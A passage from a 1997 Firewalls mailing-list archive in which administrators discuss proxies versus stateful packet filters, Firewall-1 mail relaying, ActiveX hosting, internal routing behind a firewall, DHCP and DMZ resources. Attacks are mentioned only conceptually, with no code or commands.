etc.  With SPF, the SPF box implementations I've seen don't keep state on
things like that for every connection, and if they do, normally out of
order packet reception is severly degraded. 

At some point, you lose the advantages over application layer gateways if
you keep too much state information.  Also, it's very difficult to code
application layer blocking without a great deal more work, for instance,
blocking  as a tag is different than blocking  as a
string.  

I've still yet to see an example of something a SPF blocks that an
application layer gateway doesn't.  The reverse certainly isn't true of
current implementations.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280





From owner-firewalls-outgoing  Tue Jun 10 04:10:40 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA05139 for firewalls-outgoing; Mon, 9 Jun 1997 13:21:37 -0700 (PDT)
Received: from ax-akl-fw.axon.co.nz (ax-akl-fw.axon.co.nz [202.135.112.17]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA05044 for ; Mon, 9 Jun 1997 13:21:16 -0700 (PDT)
Received: from ax-akl-exchcomm.axon.co.nz (ax-akl-exchcomm.axon.co.nz [128.1.2.60]) by ax-akl-fw.axon.co.nz (AIX4.2/UCB 8.7/) with SMTP id RAA10230 for ; Tue, 18 Apr 2000 17:04:56 +1300 (NZDT)
Received: by ax-akl-exchcomm.axon.co.nz with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5)
	id <01BC7577.70AB3E00@ax-akl-exchcomm.axon.co.nz>; Tue, 10 Jun 1997 08:22:31 +1200
Message-ID: 
From: "Edkins, Rob - Axon AKL" 
To: "'Craig Brozefsky'" 
Cc: "'martin@nii.ncb.gov.sg'" ,
        "'Francisco Lopez (Infovia)'" ,
        "'firewalls@GreatCircle.COM'" 
Subject: RE: CheckPoint Firewall-1 V. 2.1
Date: Tue, 10 Jun 1997 08:24:36 +1200
X-Mailer:  Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The SMTP Security Server from Firewall 1 V3.0 can parse any of the SMTP
message header fields.

In addition, you can do wildcard matches and rewriting actions (eg,
change user@xyz.com to user@zyx.com)

There is also a hook into a Cheyenne Innoculan add-in supplied with
V3.0, although it doesn't scan attachments.

Documentation isn't great, but it's not too difficult to set up.

I take your point about the NT SMTP PO, although maybe putting it in a
DMZ and controlling access to it is better than just letting SMTP
through to the secure side for Checkpoint 2.1 users.

Putting an Exchange Server in the DMZ would be better, but expensive and
a pain if you want it to be part of your internal Exchange Site.

The idea of letting the appropriate NETBt calls for Exchange through the
firewall doesn't thrill me, although there is a paper on it on the
Checkpoint Web site. ( http://www.checkpoint.com )

Rgds,
Rob Edkins
Systems Consultant
Axon Computertime
E-Mail: edkinsr@axon.co.nz


>-----Original Message-----
>From:	Craig Brozefsky [SMTP:craig@onshore.com]
>Sent:	Monday, June 09, 1997 6:04 PM
>To:	Edkins, Rob - Axon AKL
>Cc:	'martin@nii.ncb.gov.sg'; 'Francisco Lopez (Infovia)';
>'firewalls@GreatCircle.COM'
>Subject:	RE: CheckPoint Firewall-1 V. 2.1
>
>On Mon, 9 Jun 1997, Edkins, Rob - Axon AKL wrote:
>
>> Upgrade to version 3.0 of Firewall 1 and use the SMTP Security Server
>> feature.
>> 
>> This acts as an SMTP Relay, accepting the mail, then queuing it on.
>
>Does it perform an address parsing etc...?
>
>> Big advantage of the security server is that nobody from outside touches
>> your Exchange box directly.
>
>Yup.
>
>> Yet another way would be to install the SMTP postoffice from the NT4
>> Server Resource kit onto your v2.1 firewall and configure this as a
>> relay.
>
>I think that would be a really bad idea.  Do not put code not specifically 
>designed to operate ina secure environment on a firewall.  NT4 postoffice 
>is not my idea of 'secure' smtp service and I certainly would not want it 
>running on a firewall.
>
>Craig Brozefsky              craig@onshore.com
>onShore Inc.                 http://www.onshore.com/~craig
>Development Team             p_priority=PFUN+(p_work/4)+(2*p_cash)
>

From owner-firewalls-outgoing  Tue Jun 10 04:12:32 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA05646 for firewalls-outgoing; Mon, 9 Jun 1997 13:24:32 -0700 (PDT)
Received: from mail.rc.on.ca ([207.176.151.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA05609 for ; Mon, 9 Jun 1997 13:24:11 -0700 (PDT)
Received: by mail.rc.on.ca with Internet Mail Service (5.0.1458.11)
	id ; Mon, 9 Jun 1997 15:56:24 -0400
Message-ID: 
From: Russ 
To: cowboy@home.byelex.nl, "'Adam Shostack'" 
Cc: firewalls@GreatCircle.COM
Subject: RE: Hosting ActiveX applets
Date: Mon, 9 Jun 1997 15:56:23 -0400
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1458.11)
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Unlike some opinions, I fail to see how the web has ever been anything
other than an attempt to swing you one way or another. Sure, you could
compare it to communism and say that its always intended to be
vendor-neutral bliss, but like communism, it typically fails
implementation or beta trials.

Unlike communism, there's nothing cramming anything down your throat
(other than your management...;-]) so you're pretty much free to do what
makes sense to you and your company.

If you were trying to market a support application for your Win95-based
application, you probably couldn't give a rat's ass that the Mac or
Solaris users might not use it. Further, if you can find a way to
securely implement some incredible functionality using ActiveX why not
use it?

Like most things, there are always going to be some sites that block
your applet, and you're going to block out a segment of your viewers
from being able to use it (the amount vastly differs according to the
demographics of your audience, my site http://ntbugtraq.rc.on.ca has a
viewer community that is fully 90% IE users).

So whether or not its "really cool" to be a communist may still be a
question for you, but the answer to your question is that serving up
ActiveX objects is no different than serving up any file from your web
site. They download it and it runs on their machine. If you provide some
server to interact with your application (not your web server) then the
issue is different, but if you merely supply them with the object and
maybe some data, you're fine.

Too bad you can't ask a security question and get a security answer,
instead of some hype borne out of frustration.

>We had independance from proprietary standards.

Geez, you make it sound like it was bliss. When exactly was this nirvana
anyway? Before or after RealAudio? Too bad Microsoft came along and
totally destroyed the web, eh? After all, it was Microsoft that invented
HTML-based SMTP, wasn't it? or was it?

>The real reason to not use ActiveX is because you probably
>don't need to

Wow, this is astute. Since when did need have to be the only reason?

>, and you're segmenting out your marketplace to pay
>homage to a vendor.

Do you honestly believe what you wrote here Adam? Do you honestly
believe that all of the people writing ActiveX objects are doing so
because they want to pay homage to Microsoft? Maybe they just want to
leverage something they already have written and don't feel like
re-writing the thing in Java, amongst a hundred other reasons that don't
involve laying tribute at Microsoft's feet.

>Also, there are all sorts of security problems
>with Microsoft's implementations.

Um, with the browser, right? After all, ActiveX at the server is nothing
more than a data file, isn't it, which was, after all, the poster
question. But I suppose one must, as you obviously do, consider the
possibility of someone writing a secure object impossible.

>Many firewalls filter ActiveX, just like you do(?).

Really? I didn't think we had gotten to the stage of "many" yet Adam.
Not that they shouldn't offer the option, or that people shouldn't
employ the option if its there, I just didn't think there were that many
that did yet.

>So why are you creating web pages that your own company
>wouldn't allow in?

Probably because most do not block ActiveX.

BTW, I'm not calling anyone a communist here, it was just a convenient
analogy.

Cheers,
Russ
R.C. Consulting, Inc. - NT/Internet Security
owner of the NTBugTraq mailing list:
http://ntbugtraq.rc.on.ca/index.html


From owner-firewalls-outgoing  Tue Jun 10 04:55:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA10444 for firewalls-outgoing; Mon, 9 Jun 1997 21:30:37 -0700 (PDT)
Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.40]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id VAA10426 for ; Mon, 9 Jun 1997 21:30:28 -0700 (PDT)
Received: from adia_dso ([194.170.24.20]) by ns2.emirates.net.ae (SMI-8.6/8.6) with SMTP id IAA25943; Tue, 10 Jun 1997 08:31:04 +0400
Message-Id: <3.0.1.32.19970609114754.005a9ff0@emirates.net.ae>
X-Sender: forster@emirates.net.ae
X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
Date: Mon, 09 Jun 1997 11:47:54
To: bsdi-users@bsdi.com
From: Andrew & Terri Forster 
Subject: TCP/IP Addressing Problems with FireWall
Cc: firewalls@greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We purchased "gauntlet-type" proxy server firewall to complete our
perimeter defences project including connection to the Internet.

We are having problems of Internal clients being able to see (ping) the
Firewall and for the BSDI FireWall box to ping internal machines across our
internal router.  I have prepared a rough diagram below then some
explanations.

          I N T E R N E T 
                 |
                 |
          _______|_______
         |               |
         |               |  Internet Router 194.bbb.ccc.1 s/net 255.255.255.0
         |_______________|
                 |
                 |
      ___________|_____________________________   194.bbb.ccc.* Network
                     |
                     |
                     |
            _________|___________   Outside 194.bbb.ccc.9 s/net 255.255.255.0
           |                     |       Default Router  194.bbb.ccc.1
           |       Firewall      |
           |_____________________|  Inside 172.17.100.1 s/net 255.255.0.0
                     |
                     |
      _______________|_________________________  172.17.*.* Network (B Class)
               |                     |
               |               ______|______
               |              |  W95 Client |  172.17.30.13 B S/net
               |              |_____________|  Gateway 172.17.200.2
               |
               |
      _________|_____________________
     |     172.17.200.2              |
     |       Cisco Router            |____________________  172.20.*.*
     |       172.16.200.2            |                       (B Class)
     |____________|__________________|
                  |
                  |
      ____________|____________________________  172.16.*.* Network (B Class)
                                |
                                |
                           _____|_______
                          | W95 Client  |  172.16.30.11 (Gateway 172.16.200.2)
                          |_____________|

Note this is a test implementation of our final IP addressing Plan.  Our
registered IP C Class is used on the outside of the FireWall proxy server
firewall 194.bbb.ccc.* and our inside of the Firewall we use a a 172.17.*.*
B class network to our internal Router which also has other non-internet
data feeds (eg 172.20.*.* above).  On the inside of this internal router we
are planning to use the IP address 172.16.*.* B Class network.

Our problem is that clients on the 172.16.*.* network cannot ping (see) the
firewall as its default router (gateway) is set as 194.bbb.ccc.1.  Also the
clients on the 172.17.*.* network can see the internal network only when
the gateway is set as the 172.17.200.2 interface of the Router.  Therefore
it will not be able to see the Internet as all traffic is sent to the
inside not the outside.  The other external connections work fine as they
all refer to their Internal Router port as their default router (gateway).

Obviously I need to determine how to solve this so that the external
traffic is directed to the Internet by the firewall and inside traffic
correctly through the Router to the 172.16.*.* subnet.

Any Assistance would be appreciated

Thanks in Advance

AMF


==========================================================================
 Andrew M Forster       [GMT +4]           Email: forster@emirates.net.ae
 Phone: +9712 262556 or +9712 453613                  Fax:   +9712 465344
==========================================================================

From owner-firewalls-outgoing  Tue Jun 10 06:08:02 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA17020 for firewalls-outgoing; Mon, 9 Jun 1997 22:13:38 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA10116 for ; Mon, 9 Jun 1997 21:29:18 -0700 (PDT)
Received: from gargoyle.clark.net (gargoyle.clark.net [168.143.0.250]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id VAA00617 for ; Mon, 9 Jun 1997 21:13:59 -0700 (PDT)
Received: (qmail 14155 invoked by uid 500); 10 Jun 1997 04:16:15 -0000
Date: Tue, 10 Jun 1997 00:16:15 -0400 (EDT)
From: "Paul D. Robertson" 
X-Sender: proberts@gargoyle
To: Ryan Russell/SYBASE 
cc: firewalls 
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To: <199706100103.SAA04287@notesgw2.sybase.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> Just to clear up some of your misconceptions:
> 
> The son of OOB attack is application specific,
> effecting only the Microsoft DNS server and the 
> Microsoft Service at port 139 (which I think is the
> NetBIOS port, not sure.)  It does not effect the
> TCP driver in general.

It was my understanding that the invalid TCP window size advertisment was 
a general TCP flaw in the MS stack.  The variant I'd heard of used the 
URG flag to bypass the sequence number checking with a packet that set 
the window size to an invalid number.  For that, no packets would reach the 
application layer at all.

I'll have to hack up some code and test it, and double check my sources.

> Think of it this way.. Say I discover that if I throw the
> word "fred" into the datastream of an HTTP connection
> Netscape will delete your harddrive.  You're telling me
> that there are proxies out there that automatically
> filter out the word fred?  Before I announce the attack?

No, I'm telling you that an application layer gateway doesn't pass TCP 
options into the internal network.  I specifically said lower layer 
protocols, if you continue to want to misrepresent that as an application 
layer problem, that's up to you.  I'll say it one more time, more 
clearly, just in case you really missed it:

An application layer gateway creates its own TCP connections, and doesn't 
pass low level transport problems to the clients behind it.  Since the 
application proxy controls its own connections into the protected 
network, and external transport layer packets don't go any further than 
its external interface this makes this a non-issue for clients 
behind application layer gateways.  Only the gateway need be immune to 
invalid TCP window sizes (without sequence number validation if what I'm 
told is true, though in the case of a hostile, or compromised server, 
this doesn't make much difference).  Note this is TCP transport layer, 
*not* a higher level application transport layer (Eg. HTTP).

If you're relaying the connection, then the clients are vulnerable at the 
relay level.  If you're not, then only you are vulnerable.  Even if I 
make the assumption that the information I was given is incorrect, and 
the specific exploit isn't as I've been lead to believe, it is still a 
vulnerability of relaying at the transport layer by a gateway.  At some 
point, checking and rewriting or dropping packets gets expensive enough that 
you may as well have spent your time hardning the stack, especially when 
the machine's remote services may need hardening anyway.  

The fact remains that if you took FW1 on Solaris, and the FWTK on the same 
platform, and were to allow NetBIOS in (not that it would be prudent in most 
cases), under FW1 the "protected" clients would be vulnerable to OOB, under a 
circuit level relay like plug-gw they wouldn't.  Plug-gw isn't even an 
application layer proxy, but illustrates the difference, and point quite 
clearly.  Just as relaying at the application layer opens you up to 
application layer attacks with a proxy (and a packet filter, stateful or 
not), relaying at the transport layer leaves you open to transport layer 
attacks.

Nuff said,


Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280




From owner-firewalls-outgoing  Tue Jun 10 06:10:56 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA03138 for firewalls-outgoing; Tue, 10 Jun 1997 05:59:30 -0700 (PDT)
Received: from hp00086.ina.de (hp00086.ina.de [159.51.6.8]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA03090 for ; Tue, 10 Jun 1997 05:59:14 -0700 (PDT)
Received: from hp00002.koi.ina.de (hp00002.ina.de)
	by hp00086.ina.de with ESMTP (1.37.109.18/INA-1.0-SER)
	id AA158907541; Tue, 10 Jun 1997 14:59:02 +0200
Received: from pc00874.ina.de
	by koi.ina.de with SMTP (1.37.109.24/INA-1.0)
	id AA079287520; Tue, 10 Jun 1997 14:58:40 +0200
Received: by pc00874.ina.de with Microsoft Mail
	id <01BC75AE.E2456810@pc00874.ina.de>; Tue, 10 Jun 1997 14:59:24 +0200
Message-Id: <01BC75AE.E2456810@pc00874.ina.de>
From: Basil McCrea 
To: "'firewalls@greatcircle.com'" 
Subject: RFC for Ports
Date: Tue, 10 Jun 1997 14:59:22 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

Maybe a dumb question, but can anyone tell me which RFC describes which
port numbers correspond to which services.

TIA

Basil McCrea

From owner-firewalls-outgoing  Tue Jun 10 06:11:46 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA00288 for firewalls-outgoing; Tue, 10 Jun 1997 05:30:49 -0700 (PDT)
Received: from ns.ncsa.com (ns.ncsa.com [205.160.199.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA00218 for ; Tue, 10 Jun 1997 05:30:26 -0700 (PDT)
Received: from portal.ncsa.com (root@portal.ncsa.com [205.160.199.10]) by ns.ncsa.com (8.8.5/8.8.3) with ESMTP id IAA11634 for ; Tue, 10 Jun 1997 08:35:21 -0400
Received: from serv_10.ncsa.com (serv10.ncsa.com [172.20.200.10])
          by portal.ncsa.com (8.8.5/8.8.4) with SMTP
	  id IAA01871 for ; Tue, 10 Jun 1997 08:35:44 -0400
Received: by serv_10.ncsa.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63)
	id <01BC7579.2B9AF740@serv_10.ncsa.com>; Tue, 10 Jun 1997 08:34:54 -0400
Message-ID: 
From: Jonathan McCown 
To: "'firewalls@GreatCircle.COM'" ,
        "'BLeBlanc@igate.sprint.com'" 
Subject: RE: ISP Connection (mainly 3rd party FW services)
Date: Tue, 10 Jun 1997 08:34:53 -0400
X-Mailer:  Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

(Mariko Yashada's question was: value of, components of 3rd party
management of firewalls)
(most of Bob LeBlanc's discussion of 3rd party issues elided)
>
>[Bob noted]
>What standard services does the third party perform?  You (the customer)
>must have the ability to sit with the third party and "design a
>unique-to-you" security service.  YOU must be able to determine the
>rules.  

In my experience, a productive 3rd party "value add" is having the
"stated policy" of the firewall verified periodically-- and keeping this
audit-type function in the hands of a party other than the firewall
admin is a wise thing.   

We've found that what many sites _believe_ they have implemented as a
policy is remarkably different from what is actually happening on the
wire.  MJR's quote about "seatbelts worn around the neck" applies.

- Jon

From owner-firewalls-outgoing  Tue Jun 10 06:26:10 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA04770 for firewalls-outgoing; Tue, 10 Jun 1997 06:12:11 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA04741 for ; Tue, 10 Jun 1997 06:11:55 -0700 (PDT)
Received: from newman by newman (SMI-8.6/SMI-SVR4)
	id JAA20454; Tue, 10 Jun 1997 09:10:16 -0400
Message-ID: <339D5238.ABCA8E2A@unifiedtech.com>
Date: Tue, 10 Jun 1997 09:10:16 -0400
From: Mike Jones 
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u)
MIME-Version: 1.0
To: Geoff Breach 
CC: firewalls@greatcircle.com
Subject: Re: DHCP and Firewall 1
X-Priority: 3 (Normal)
References: <9706092044.AA02756@ny_nx_mail1.ncmi-gsl.com> <339cc303.680912366@news>
Content-Type: multipart/mixed; boundary="------------4A6AF6B824BB52C1FBB9A2A3"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This is a multi-part message in MIME format.
--------------4A6AF6B824BB52C1FBB9A2A3
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Geoff Breach wrote:
> On Mon,  9 Jun 97 16:44:44 -0400, donaldb@ncmi-ny.com (Donald Branch)
> wrote:
> >I have a Windows NT machine running DHCP  I want to be able from
> >that one machine to be able to get out to AOL but since it's ip
> >address keeps changing  I can't make a rule based on his ip address.
> >keeps changing
> Only one way. Keep it's IP address from changing. If you configure
> your DHCP server to always hand out the same address to that
> machine's MAC address, you get a middle ground between the benefits
> of DHCP and the benefits of fixed addressing.

Not so. You can use user authentication on the outbound FTP
session.
 
>  Yeah, there are other ways, authenticate, etc, but too much
> trouble IMHO.

Too much trouble? For a single user? If it were for 50 users,
then yeah, but for one it's no biggie.

As far as that goes, if you are using a reasonably large (say,
a month or more) lease time on your DHCP server the IP address
of the machine you're working on will never change unless you
go off the network (e.g., don't turn the machine one) for over
a month. So the idea of doing it by IP address isn't completely
out of the question. DHCP doesn't have to be minute-by-minute
dynamic in most environments to be useful.

--
	Mike Jones
	Sr. Technology Advisor
	UNIFIED Technologies
--------------4A6AF6B824BB52C1FBB9A2A3
Content-Type: text/x-vcard; charset=us-ascii; name="vcard.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Mike Jones
Content-Disposition: attachment; filename="vcard.vcf"

begin:          vcard
fn:             Mike Jones
n:              Jones;Mike
org:            Unified Technologies
adr:            ;;105 Jordan Road;Troy;NY;12180;US
email;internet: mike.jones@unifiedtech.com
title:          Sr. Technology Advisor
tel;work:       (518) 283-1003
tel;fax:        (518) 283-1189
x-mozilla-cpt:  ;0
x-mozilla-html: FALSE
end:            vcard


--------------4A6AF6B824BB52C1FBB9A2A3--


From owner-firewalls-outgoing  Tue Jun 10 06:41:59 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA07835 for firewalls-outgoing; Tue, 10 Jun 1997 06:36:51 -0700 (PDT)
Received: from gibraltar.drco.com (gibraltar.drco.com [206.0.12.6]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA07825 for ; Tue, 10 Jun 1997 06:36:44 -0700 (PDT)
Received: from fim.dillon.com ([5.5.5.11]) by gibraltar.drco.com
          (Netscape Mail Server v2.0) with ESMTP id AAA3811
          for ; Tue, 10 Jun 1997 09:36:15 -0400
Received: from bogdan.dillon.com ([5.5.5.134]) by fim.dillon.com
          (Netscape Mail Server v2.0) with ESMTP id AAA6591;
          Tue, 10 Jun 1997 09:37:36 -0400
Message-ID: <339D5831.8A959A3F@drco.com>
Date: Tue, 10 Jun 1997 09:35:46 -0400
From: Dan Anghelescu 
Reply-To: danghelescu@drco.com
Organization: Dillon Read & Co., Inc.
X-Mailer: Mozilla 4.0b5 [en] (Win95; I)
MIME-Version: 1.0
To: Costa Simona 
CC: "'Firewalls@GreatCircle.com'" 
Subject: Re: DMZ
X-Priority: 3 (Normal)
References: 
Content-Type: text/plain; charset=iso-8859-1
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Costa Simona wrote:

> Hi everybody!
>
> I'm looking for some documentation concerning DMZ, just to explain to
> the boss what it is, how is configured and so on.
>
> Can any one help?
> Thank you in advance.
>
> Simona

 O'Reilly has some very good books on firewalls. Check
http://www.ora.com/catalog/fire

DAn


From owner-firewalls-outgoing  Tue Jun 10 07:40:52 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA09533 for firewalls-outgoing; Tue, 10 Jun 1997 06:50:36 -0700 (PDT)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA09500 for ; Tue, 10 Jun 1997 06:50:23 -0700 (PDT)
Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id JAA03252 for ; Tue, 10 Jun 1997 09:50:39 -0400 (EDT)
Message-Id: <199706101350.JAA03252@mail.clark.net>
Comments: Authenticated sender is 
From: "Marcus J. Ranum" 
Organization: Network Flight Recorder, Inc.
To: Firewalls@GreatCircle.COM
Date: Tue, 10 Jun 1997 09:49:11 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: Stateful Packet Filters vs. Proxies
Reply-to: mjr@clark.net
In-reply-to: <199706100557.WAA25032@honor.greatcircle.com>
X-mailer: Pegasus Mail for Win32 (v2.53/R1)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


How many angels can dance on a proxy? What about
a packet filter? Surely whichever supports more angels
is better!

mjr.
-----
Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
Personal
Work
New Book!!

From owner-firewalls-outgoing  Tue Jun 10 07:44:47 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA10304 for firewalls-outgoing; Tue, 10 Jun 1997 06:56:21 -0700 (PDT)
Received: from onshore.com (irc.onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA10276 for ; Tue, 10 Jun 1997 06:56:13 -0700 (PDT)
Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id IAA26170; Tue, 10 Jun 1997 08:57:32 -0500
Date: Tue, 10 Jun 1997 08:57:32 -0500
From: Craig Brozefsky 
Subject: Re: Stateful Packet Filters vs. Proxies
To: firewalls 
In-Reply-To: <199706092304.QAA28403@notesgw2.sybase.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk




On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> >This means that NT machines behind SPFs are vulnerable to "Son of OOB"
> >type attacks, not so proxy protected machines behind a non-NT proxy.  
> 
> A proxy would have to written specifically to handle the OOB problem,
> it would not be handled automatically.  It would probably be easier
> to modify the SPF to catch it, actually.  Imagine if you were using the
> host OS, and your proxy depended to some degree on the NetBIOS
> over TCP implementation in NT - then your proxy would get nailed
> by the OOB attack, and not the inside machine.

A proxy would not have to be re-written to catch it if it's host OS was 
not succeptable to it, ie it wasn't running NT.  It does not directly 
pass the OOB packet to the internal hosts, nor in this case would the 
proxy be passing artifically generated and mis-configured window sizes 
and URG pointer values(two attacks on NT are based on this) to the 
internal hosts since it would be re-writing the packets with it's own 
stack, and discarding window/urg pointer information.

> In general, a proxy will not protect you against attacks
> that didn't exist or weren't know at the time it was written.

Same for SPF, but unlike SPF's, the space of possible attacks which would 
fail open is reduced, ie, no packet level attacks, no need to compensate 
for services on the inside (your mail server) and there implementation 
problems.

I like the idea of a SPF, or rather a filtering mechanism with tons of 
features, sitting in the stack in front of application level proxies.  
That would be ideal.  Could be on seperate machines for all I care.

From owner-firewalls-outgoing  Tue Jun 10 08:17:25 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA09735 for firewalls-outgoing; Tue, 10 Jun 1997 06:52:56 -0700 (PDT)
Received: from sagan.pacific.net.sg (sagan.pacific.net.sg [203.120.90.70]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA09710 for ; Tue, 10 Jun 1997 06:52:46 -0700 (PDT)
Received: from frogger (ts900-15830.singnet.com.sg [165.21.185.114])
	by sagan.pacific.net.sg with SMTP
	id VAA25534; Tue, 10 Jun 1997 21:53:25 +0800 (SGT)
Message-Id: <199706101353.VAA25534@sagan.pacific.net.sg>
Comments: Authenticated sender is 
From: "Wong Ee Sing" 
To: bsdi-users@bsdi.com, Andrew & Terri Forster 
Date: Tue, 10 Jun 1997 21:50:08 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: TCP/IP Addressing Problems with FireWall
CC: firewalls@GreatCircle.COM
In-reply-to: <3.0.1.32.19970609114754.005a9ff0@emirates.net.ae>
X-mailer: Pegasus Mail for Win32 (v2.52)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>           I N T E R N E T 
>                  |
>                  |
>           _______|_______
>          |               |
>          |               |  Internet Router 194.bbb.ccc.1 s/net 255.255.255.0
>          |_______________|
>                  |
>                  |
>       ___________|_____________________________   194.bbb.ccc.* Network
>                      |
>                      |
>                      |
>             _________|___________   Outside 194.bbb.ccc.9 s/net 255.255.255.0
>            |                     |       Default Router  194.bbb.ccc.1
>            |       Firewall      |
>            |_____________________|  Inside 172.17.100.1 s/net 255.255.0.0
>                      |
>                      |
>       _______________|_________________________  172.17.*.* Network (B Class)
>                |                     |
>                |               ______|______
>                |              |  W95 Client |  172.17.30.13 B S/net
>                |              |_____________|  Gateway 172.17.200.2
>                |
>                |
>       _________|_____________________
>      |     172.17.200.2              |
>      |       Cisco Router            |____________________  172.20.*.*
>      |       172.16.200.2            |                       (B Class)
>      |____________|__________________|
>                   |
>                   |
>       ____________|____________________________  172.16.*.* Network (B Class)
>                                 |
>                                 |
>                            _____|_______
>                           | W95 Client  |  172.16.30.11 (Gateway 172.16.200.2)
>                           |_____________|
> 
> Our problem is that clients on the 172.16.*.* network cannot ping (see) the
> firewall as its default router (gateway) is set as 194.bbb.ccc.1.  Also the
> clients on the 172.17.*.* network can see the internal network only when
> the gateway is set as the 172.17.200.2 interface of the Router.  Therefore
> it will not be able to see the Internet as all traffic is sent to the
> inside not the outside.  The other external connections work fine as they
> all refer to their Internal Router port as their default router (gateway).
> 
Clients on 172.16.*.* _should_ be set default gateway to 172.16.200.2 
not 194.bbb.ccc.1. Reason being gateways by definition must be in the 
same subnet as the clients! Otherwise the gateway will not be 
reachable. The router at 172.16.200.2 will have its gateway set for 
172.17.100.1 which _also_ solve the problem of clients on 172.17.*.* 
being unable to see both the internal network AND the internet. 
Assume all clients on 172.17.*.* have as their gateway 
172.17.200.2 , client request to router at 172.17.200.2 will be 
directed to its gateway at 172.17.100.1 if it is meant for the 
internet (meaning it doesn't have the route listed as an internal 
network) and directed inward if the destination ip belong to 
172.16.*.*. Routing is a router function remember? Redirection 
happens by way of ICMP redirects which is full supported by CISCO 
IOS.

Of course once traffic reaches 172.17.100.1 the gauntlet proxy takes 
over and send the traffic out to the net as necessary. In fact it is 
suppose to hide traffic in such a way that reference to 192.bbb.ccc.1 
will never be necessary.

Hope I got all the facts straight. :-)

x
ee sing


From owner-firewalls-outgoing  Tue Jun 10 08:30:25 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA08778 for firewalls-outgoing; Tue, 10 Jun 1997 06:43:32 -0700 (PDT)
Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA08746 for ; Tue, 10 Jun 1997 06:43:19 -0700 (PDT)
